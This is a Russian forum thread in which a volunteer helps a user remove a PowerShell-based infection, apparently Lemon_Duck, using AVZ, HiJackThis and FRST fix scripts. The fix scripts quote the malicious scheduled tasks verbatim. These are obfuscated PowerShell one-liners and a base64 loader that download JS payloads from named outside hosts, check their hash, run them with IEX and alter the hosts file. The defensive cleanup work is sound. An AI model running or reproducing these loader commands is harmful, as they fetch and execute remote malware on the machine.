Форум программистов, компьютерный форум, киберфорум
Лечение компьютерных вирусов
Войти
Регистрация
Восстановить пароль
 
BearOwl
0 / 0 / 0
Регистрация: 19.12.2019
Сообщений: 7
1

Вирус запускает powershell и перегружает систему

07.02.2020, 22:26. Просмотров 244. Ответов 6
Метки нет (Все метки)

Здравствуйте! Кажется, что у меня внов появился на компьютере вирус . Сперва, появляются странные файлы, которые загружаются на флешке сами, потом стал перегружать систему powershell. Снимаю задачу, становится легче, но через 20 минут снова появляются процессы powershell
0
Вложения
Тип файла: zip CollectionLog-2020.02.08-00.23.zip (92.4 Кб, 1 просмотров)
QA
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
07.02.2020, 22:26
Ответы с готовыми решениями:

вирус запускает powershell и перегружает систему
Здравствуйте! Пару недель у меня появился на компьютере вирус (подцепил из компьютера на работе,...

Вирус который перегружает процессор и оперативную память!
Установил программу,а с ней установилось море программ и реклама в браузер,а так же игры...

Вирус переодически перегружает процессор на 100% и оперативную память
Установил программу,а с ней установилось море программ и реклама в браузер,процессор загружен на...

Вирус с PowerShell
Добрый день, недавно я заметил, что пару раз в течение дня антивирус ругается на powershell и...

6
severnyj
Вирусоборец
3576 / 1858 / 273
Регистрация: 04.04.2012
Сообщений: 6,924
09.02.2020, 01:15 2
Деинсталлируйте следующее ПО:

Softonic Assistant [2016/04/24 18:33:43]-->C:\Users\HP\AppData\Local\SoftonicAssistant\Uninstall.exe
Выполните скрипт в AVZ C:\Users\HP\Desktop\AutoLogger\AVZ\avz.exe (Файл - Выполнить скрипт):

Код
begin
 QuarantineFile('C:\Users\HP\AppData\Local\SoftonicAssistant\SoftonicAssistant.exe', '');
 DeleteFile('C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe', '64');
 DeleteFile('C:\Windows\system32\drivers\aswHdsKe.sys', '64');
 DeleteFile('C:\Windows\system32\DRIVERS\aswTap.sys', '64');
 DeleteFile('C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys', '64');
 DeleteFile('C:\Users\HP\AppData\Local\Yandex\BrowserManager\MBLauncher.exe', '32');
 DeleteFile('C:\Users\HP\AppData\Local\SoftonicAssistant\SoftonicAssistant.exe', '32');
 DeleteFile('C:\Users\HP\AppData\Local\SoftonicAssistant\SoftonicAssistant.exe', '64');
 DeleteFile('C:\Users\HP\AppData\Local\Yandex\BrowserManager\MBLauncher.exe', '64');
 DeleteFile('C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe', '32');
 DeleteFile('C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe', '64');
 DeleteService('TuneUpUtilitiesDrv');
 DeleteService('aswTap');
 DeleteService('aswHdsKe');
 DeleteService('TuneUp.UtilitiesSvc');
 DelCLSID('{4838CD50-7E5D-4811-9B17-C47A85539F28}');
 DelCLSID('{4858E7D9-8E12-45a3-B6A3-1CD128C9D403}');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'Browser Manager', 'x32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'SoftonicAssistant', 'x32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved', '{4858E7D9-8E12-45a3-B6A3-1CD128C9D403}', 'x32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved', '{4838CD50-7E5D-4811-9B17-C47A85539F28}', 'x32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'SoftonicAssistant', 'x64');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'Browser Manager', 'x64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved', '{4858E7D9-8E12-45a3-B6A3-1CD128C9D403}', 'x64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved', '{4838CD50-7E5D-4811-9B17-C47A85539F28}', 'x64');
 DeleteSchedulerTask('EF28qmKRAfr\2fh0H4Mzo');
 DeleteSchedulerTask('FHW7RVvwSyz');
 DeleteSchedulerTask('Microsoft\Windows\jMfdT6p8lO\AajVxfiwu7C');
 DeleteSchedulerTask('Microsoft\Windows\vta6Dgd7Nl\KegLBytnVao');
 DeleteSchedulerTask('NJwSj3flKBg');
 DeleteSchedulerTask('xdKMEo\V80OFT');
 DeleteSchedulerTask('{990BDF44-1925-4461-8162-64263DE428F7}');
 DeleteSchedulerTask('DriverToolkit Autorun.job');
 DeleteSchedulerTask('DriverToolkit Autorun');
 DeleteSchedulerTask('TuneUpUtilities_Task_BkGndMaintenance2013');
 ClearHostsFile;
ExecuteSysClean;
 ExecuteWizard('TSW', 2, 3, true);
RebootWindows(true);
end.
Компьютер перезагрузится.

Подготовьте новые логи Autologger
0
BearOwl
0 / 0 / 0
Регистрация: 19.12.2019
Сообщений: 7
09.02.2020, 11:38  [ТС] 3
После выполнения скрипта
0
Вложения
Тип файла: zip CollectionLog-2020.02.09-13.16.zip (79.4 Кб, 1 просмотров)
severnyj
Вирусоборец
3576 / 1858 / 273
Регистрация: 04.04.2012
Сообщений: 6,924
09.02.2020, 12:00 4
Выполните скрипт в AVZ C:\Users\HP\Desktop\AutoLogger\AVZ\avz.exe (Файл - Выполнить скрипт):

Код
begin
 DeleteFile('C:\ProgramData\Tmp0x0x\Pr1', '64');
 RegKeyDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\Eventlog\Application\WindowsMangerProtect', 'x64');
 RegKeyDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\Eventlog\TuneUp\TuneUp.UtilitiesSvc', 'x64');
ExecuteSysClean;
 ExecuteWizard('TSW', 2, 3, true);
RebootWindows(true);
end.
Компьютер перезагрузится, после перезагрузки

Пофиксите в HJT (C:\Users\HP\Desktop\AutoLogger\HiJackThis\HiJackThis.exe):

Код
R0 - HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command: (default) = C:\Program Files\Internet Explorer\iexplore.exe http://www.yoursearching.com/?type=sc&ts=1449400566&z=5ff93257fdef6effec2e407g5zfz2t8z6e2ecw0q8w&from=itr&uid=HGSTXHTS541010A9E680_JA10001F1BRE6N1BRE6NX
O2 - HKLM\..\BHO: VK OK AdBlock - {FF20459C-DA6E-41A7-80BC-8F4FEFD9C575} - (no file)
O2-32 - HKLM\..\BHO: VK OK AdBlock - {FF20459C-DA6E-41A7-80BC-8F4FEFD9C575} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00avast: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file)
O22 - Task: \Microsoft\Windows\icxTMI\qYsEPOQKl - C:\Windows\system32\cmd.exe /c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBNAGkAYwByAG8AUwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABpAGMAeABUAE0ASQBcAHEAWQBzAEUAUABPAFEASwBsACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAbQB4AG4AeQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBpAGcAXwAyADAAMQA5ADEAMQAwADgAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfAC4AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"
O22 - Task: bluetea - bluetea (file missing)

Подготовьте логи FRST
0
BearOwl
0 / 0 / 0
Регистрация: 19.12.2019
Сообщений: 7
09.02.2020, 13:10  [ТС] 5
Выполнено
0
BearOwl
0 / 0 / 0
Регистрация: 19.12.2019
Сообщений: 7
09.02.2020, 13:27  [ТС] 6
выполнено
0
Вложения
Тип файла: zip 21.zip (36.8 Кб, 2 просмотров)
severnyj
Вирусоборец
3576 / 1858 / 273
Регистрация: 04.04.2012
Сообщений: 6,924
09.02.2020, 14:38 7
Отключите до перезагрузки антивирус.
Выделите следующий код:

Код
Start::
CreateRestorePoint:
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
Copy: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.bak
C:\Windows\System32\cmd.exe
HKU\S-1-5-21-1839974309-3825269916-3444348739-1002\...\Run: [Joxi] => [X]
HKU\S-1-5-21-1839974309-3825269916-3444348739-1002\...\Run: [GoogleChromeAutoLaunch_AF07ADB424B82216064A05A2CAB71EA4] => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {0860F49B-7C68-4C06-A779-C791434B0002} - System32\Tasks\BFLuC93Y => powershell -c "$Lemon_Duck='\trShTnNZ';$x='t.tr2'+'q.com';;$y='hxxp://'+$x+'/x.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"
Task: {1070C49E-3950-4B71-8170-2A6BD8284637} - \xalLKMnk\GEtHceS -> No File <==== ATTENTION
Task: {2A4BB153-CB9C-40E8-8FB2-84AA1A7DC335} - System32\Tasks\bOWy5rxw => powershell -c "$Lemon_Duck='\bOWy5rxw';$x='CuP1O'+'0gEhvT.cn';[Net.Dns]::GetHostAddresses('t.tr2'+'q.com')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='hxxp://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Crypto (the data entry has 135 more characters).
Task: {2F0BDEAD-FB28-4CB1-8E66-DA5EE74C40DA} - System32\Tasks\MicroSoft\Windows\cjp6ETsl78d\ycwHgDV => powershell -c "$Lemon_Duck='MicroSoft\Windows\cjp6ETsl78d\ycwHgDV';$x='y3WLB'+'aNQz.kr';[Net.Dns]::GetHostAddresses('t.amx'+'ny.com')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='hxxp://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"( (the data entry has 162 more characters).
Task: {3339B0F8-33A2-4A85-8BA6-892258067DC7} - System32\Tasks\I7feVp\zsPZ5SI => powershell -c "$Lemon_Duck='I7feVp\zsPZ5SI';$x='t.awc'+'na.com';;$y='hxxp://'+$x+'/x.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"
Task: {34167B95-D568-42FF-AB5B-7E5AF72DC70B} - System32\Tasks\MicroSoft\Windows\jSI4Ch\mJY5zQr => powershell -c "$Lemon_Duck='MicroSoft\Windows\jSI4Ch\mJY5zQr';$x='t.amx'+'ny.com';;$y='hxxp://'+$x+'/x.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-j (the data entry has 16 more characters).
Task: {40C43985-8F19-4E0E-8BB1-45A5D2B71D3C} - System32\Tasks\MicroSoft\Windows\jHnoPft9\rXRFxAkf => powershell -c "$Lemon_Duck='MicroSoft\Windows\jHnoPft9\rXRFxAkf';$x='t.amx'+'ny.com';;$y='hxxp://'+$x+'/x.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX (the data entry has 19 more characters).
Task: {4ECC0FF7-6D95-453F-980D-4C27CC0A8A6E} - System32\Tasks\AdLF3S => powershell -c "$Lemon_Duck='\AdLF3S';$x='t.tr2'+'q.com';;$y='hxxp://'+$x+'/x.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"
Task: {5930EA94-5819-4857-9ABD-33F4F8E5773C} - \nAuQf -> No File <==== ATTENTION
Task: {7A11A6BA-6921-409B-9C49-B8A05E28CF34} - \QaFDsC -> No File <==== ATTENTION
Task: {7B9B50F2-9F4E-42D7-B32C-90466AEEB116} - System32\Tasks\MicroSoft\Windows\OnNogsAz\kdLE0sjHhGf => powershell -c "$Lemon_Duck='MicroSoft\Windows\OnNogsAz\kdLE0sjHhGf';$x='HyYMX'+'zEg5I.kr';[Net.Dns]::GetHostAddresses('t.amx'+'ny.com')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='hxxp://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData (the data entry has 164 more characters).
Task: {803E8595-3F8F-47A1-ABC3-AAC8010A5454} - System32\Tasks\LHdMZtqF\jDKFh1rum9A => powershell -c "$Lemon_Duck='LHdMZtqF\jDKFh1rum9A';$x='9FxHU'+'DBhM.jp';[Net.Dns]::GetHostAddresses('t.awc'+'na.com')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='hxxp://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Secur (the data entry has 145 more characters).
Task: {A4016832-CDCF-4EBE-8295-FBA1A6A4EC16} - System32\Tasks\st7JNpvBW\mZJOnAk4wy => powershell -c "$Lemon_Duck='st7JNpvBW\mZJOnAk4wy';$x='yT4xN'+'I3.jp';[Net.Dns]::GetHostAddresses('t.awc'+'na.com')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='hxxp://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Securit (the data entry has 143 more characters).
Task: {A8582A29-95E6-44E2-86A9-95B1248B804D} - System32\Tasks\bluetea => bluetea
Task: {AC6ECD29-F45A-445A-9F4B-7F0B32A997E8} - System32\Tasks\MicroSoft\Windows\xudcDnLN2\27onhyK => powershell -c "$Lemon_Duck='MicroSoft\Windows\xudcDnLN2\27onhyK';$x='t.amx'+'ny.com';;$y='hxxp://'+$x+'/x.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX (the data entry has 19 more characters).
Task: {B9D3D8FB-E35F-456A-8520-DDD0488ACF19} - System32\Tasks\iPUuRd\z56iwKM => powershell -c "$Lemon_Duck='iPUuRd\z56iwKM';$x='t.awc'+'na.com';;$y='hxxp://'+$x+'/x.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"
Task: {BD4FDAE6-0FBA-4C11-A90F-752B9A4FF4D9} - System32\Tasks\trShTnNZ => powershell -c "$Lemon_Duck='\trShTnNZ';$x='t.tr2'+'q.com';;$y='hxxp://'+$x+'/x.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"
Task: {C211BE73-84EA-43DC-B7A1-A05E81DDFA61} - \BgOyGS\yGdmE -> No File <==== ATTENTION
Task: {C382FC88-FC77-41C0-9F6F-2806EF1A1208} - System32\Tasks\qQBupvN7Z8\5RlFX1Wjkv => powershell -c "$Lemon_Duck='qQBupvN7Z8\5RlFX1Wjkv';$x='t.awc'+'na.com';;$y='hxxp://'+$x+'/x.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]] (the data entry has 5 more characters).
Task: {DCA37545-EEEB-4098-A7EC-62EAD2403384} - System32\Tasks\fiRYIkAl => powershell -c "$Lemon_Duck='\fiRYIkAl';$x='t.tr2'+'q.com';;$y='hxxp://'+$x+'/x.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"
Task: {EFEFA956-12C1-4A17-AF26-38CF6C524253} - \ZVtwQTJhP -> No File <==== ATTENTION
Task: {F738A862-D5AA-43CA-8134-7D24DF20477D} - System32\Tasks\tV3LBzE0\MhgFVyTJBXE => powershell -c "$Lemon_Duck='tV3LBzE0\MhgFVyTJBXE';$x='Dbcef'+'FYvtVN.jp';[Net.Dns]::GetHostAddresses('t.awc'+'na.com')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='hxxp://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Sec (the data entry has 147 more characters).
Task: {F94DEF4C-C95A-4189-A2C9-CF86CF6CC4CB} - \RLXqQB\fTsamcgP -> No File <==== ATTENTION
Task: {FCD8CB01-4CC3-424B-9AA0-B12D9C144EE5} - System32\Tasks\MicroSoft\Windows\V21UAfT\Mi8nZ49S => powershell -c "$Lemon_Duck='MicroSoft\Windows\V21UAfT\Mi8nZ49S';$x='5sz3f'+'1vZA.kr';[Net.Dns]::GetHostAddresses('t.amx'+'ny.com')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='hxxp://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y) (the data entry has 159 more characters).
Task: {FDB48908-C6E5-44E0-A5B9-DB882B4E2121} - System32\Tasks\EX3jULOe => powershell -c "$Lemon_Duck='\EX3jULOe';$x='kmzw2'+'Ils.cn';[Net.Dns]::GetHostAddresses('t.tr2'+'q.com')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='hxxp://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptogra (the data entry has 132 more characters).
Hosts:
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
SearchScopes: HKU\S-1-5-21-1839974309-3825269916-3444348739-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
Toolbar: HKU\S-1-5-21-1839974309-3825269916-3444348739-1002 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
FF Extension: (No Name) - C:\Users\HP\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\data [2016-12-10] [not signed]
FF Extension: (No Name) - C:\Users\HP\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\defaults [2016-12-10] [not signed]
FF Extension: (No Name) - C:\Users\HP\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\lib [2016-12-10] [not signed]
FF Extension: (No Name) - C:\Users\HP\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\resources [2016-12-10] [not signed]
FF Extension: (No Name) - C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\04e2-94e3-03a3-b342 [2016-12-03] [not signed]
FF Extension: (Домашняя страница Mail.Ru) - C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\homepage@mail.ru.xpi [2018-11-30] [UpdateUrl:hxxps://crxmailru.cdnmail.ru/go_ffhp_update.json]
FF Extension: (Стартовая — Яндекс) - C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\homeutil@yandex.ru.xpi [2019-11-28]
FF Extension: (Поиск Mail.Ru) - C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\search@mail.ru.xpi [2018-11-30] [UpdateUrl:hxxps://crxmailru.cdnmail.ru/searchff/update.json]
CHR Extension: (Fast search) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2016-12-03]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKU\S-1-5-21-1839974309-3825269916-3444348739-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof]
CHR HKU\S-1-5-21-1839974309-3825269916-3444348739-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
CHR HKU\S-1-5-21-1839974309-3825269916-3444348739-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj]
CHR HKU\S-1-5-21-1839974309-3825269916-3444348739-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd]
CHR HKLM-x32\...\Chrome\Extension: [ahkmpjnmnhjkpkacdhkliipnncobgkhk]
CHR HKLM-x32\...\Chrome\Extension: [aminlpmkfcdibgpgfajlgnamicjckkjf]
CHR HKLM-x32\...\Chrome\Extension: [aonedlchkbicmhepimiahfalheedjgbh]
CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci]
CHR HKLM-x32\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof]
CHR HKLM-x32\...\Chrome\Extension: [cpegcopcfajiiibidlaelhjjblpefbjk]
CHR HKLM-x32\...\Chrome\Extension: [epgjfmblhacacphaljkdcjllkomdcjpc]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif]
CHR HKLM-x32\...\Chrome\Extension: [ilhapdfjlmhfdgdbefpinebijmhjijpn]
CHR HKLM-x32\...\Chrome\Extension: [jdkihdhlegcdggknokfekoemkjjnjhgi]
CHR HKLM-x32\...\Chrome\Extension: [lgdnilodcpljomelbbnpgdogdbmclbni]
CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj]
CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd]
CHR HKLM-x32\...\Chrome\Extension: [pfigaoamnncijbgomifamkmkidnnlikl]
OPR Extension: (Помощник) - C:\Users\HP\AppData\Roaming\Opera Software\Opera Stable\Extensions\cbbpicnbcjaeeenbmilcnaojfgnmlhhb [2018-04-25]
R2 UxTuneUp; C:\Windows\System32\uxtuneup.dll [42808 2014-07-14] (AVG Netherlands B.V. -> AVG)
R2 UxTuneUp; C:\Windows\SysWOW64\uxtuneup.dll [35640 2014-07-14] (AVG Netherlands B.V. -> AVG)
S3 Survarium Update Service; "C:\Program Files (x86)\Survarium\game\binaries\x86\survarium_service.exe" "Survarium" [X]
2020-02-09 14:32 - 2020-02-09 14:33 - 000003298 _____ C:\Windows\system32\Tasks\bluetea
2020-02-09 14:32 - 2020-02-09 14:32 - 000004312 _____ C:\Windows\system32\Tasks\bOWy5rxw
2020-02-09 14:32 - 2020-02-09 14:32 - 000004306 _____ C:\Windows\system32\Tasks\EX3jULOe
2020-02-09 14:32 - 2020-02-09 14:32 - 000004026 _____ C:\Windows\system32\Tasks\trShTnNZ
2020-02-09 14:32 - 2020-02-09 14:32 - 000004026 _____ C:\Windows\system32\Tasks\BFLuC93Y
2020-02-09 14:32 - 2020-02-09 14:32 - 000004022 _____ C:\Windows\system32\Tasks\AdLF3S
2020-02-09 14:32 - 2020-02-09 14:32 - 000000000 ____D C:\Windows\system32\Tasks\tV3LBzE0
2020-02-09 14:32 - 2020-02-09 14:32 - 000000000 ____D C:\Windows\system32\Tasks\st7JNpvBW
2020-02-09 14:32 - 2020-02-09 14:32 - 000000000 ____D C:\Windows\system32\Tasks\LHdMZtqF
2020-02-09 14:32 - 2020-02-09 14:32 - 000000000 ____D C:\Windows\system32\Tasks\iPUuRd
2020-02-09 14:32 - 2020-02-09 14:32 - 000000000 ____D C:\Windows\system32\Tasks\I7feVp
2020-02-09 14:31 - 2020-02-09 14:31 - 000004026 _____ C:\Windows\system32\Tasks\fiRYIkAl
2020-02-09 14:31 - 2020-02-09 14:31 - 000000000 ____D C:\Windows\system32\Tasks\qQBupvN7Z8
HKU\S-1-5-21-1839974309-3825269916-3444348739-1002\...\StartupApproved\Run: => "Browser Manager"
HKU\S-1-5-21-1839974309-3825269916-3444348739-1002\...\StartupApproved\Run: => "MailRuUpdater"
HKU\S-1-5-21-1839974309-3825269916-3444348739-1002\...\StartupApproved\Run: => "amigo"
HKU\S-1-5-21-1839974309-3825269916-3444348739-1002\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_AF07ADB424B82216064A05A2CAB71EA4"
HKLM\...\StartupApproved\Run32: => "Kinoroom Browser"
FirewallRules: [{F77B5C6F-F9D4-47C8-A485-6382986E78BC}] => (Allow) C:\Program Files\UBar\ubar.exe No File
FirewallRules: [{EAD7A70A-9919-4408-BFF9-67FCBE52A74A}] => (Allow) C:\Program Files (x86)\Adguard\AdguardSvc.exe No File
FirewallRules: [{7B825C08-03C0-4669-BB6F-8CB838ABEC66}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596_0\SZBrowser.exe No File
FirewallRules: [{DA5023BD-6E84-4B4E-A9A8-936CA85D0963}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.607\SZBrowser.exe No File
FirewallRules: [{2B4257B4-4F8B-42AA-B83C-2610A31A1AEC}] => (Allow) C:\Program Files (x86)\Survarium\temp\survarium_launcher.exe No File
FirewallRules: [{F38BC6D8-B03D-4932-80AE-EEF8555271B2}] => (Allow) C:\Program Files (x86)\Survarium\temp\survarium_updater.exe No File
FirewallRules: [{4688F3BE-2F47-4BA2-8664-160DCBA8C91E}] => (Allow) C:\Program Files (x86)\Survarium\temp\survarium_updater.exe No File
FirewallRules: [{9522C422-73BC-437D-8BD5-AA54444C5DD1}] => (Allow) C:\Program Files (x86)\Survarium\temp\survarium_updater.exe No File
FirewallRules: [{D26DE9A6-8A3A-43D2-8728-17699CC198E9}] => (Allow) C:\Program Files (x86)\Survarium\temp\survarium_updater.exe No File
C:\Program Files\UBar\
C:\Program Files\AVAST Software\
EmptyTemp:
Reboot:
End::
Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
0
09.02.2020, 14:38
Answers
Эксперт
